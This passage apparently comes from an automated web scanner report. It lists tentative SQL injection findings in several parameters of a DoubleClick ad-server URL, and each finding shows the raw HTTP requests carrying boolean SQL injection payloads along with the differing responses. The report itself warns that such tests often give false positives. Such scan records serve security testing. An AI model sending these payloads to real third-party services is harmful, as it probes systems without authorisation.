Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5449

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0417-_-0430");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=124
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [orh parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The orh parameter appears to be vulnerable to SQL injection attacks. The payloads 22418465'%20or%201%3d1--%20 and 22418465'%20or%201%3d2--%20 were each submitted in the orh parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5576

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Es
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 848

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/k;239957923;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.5. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pg parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pg parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pg parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pt parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
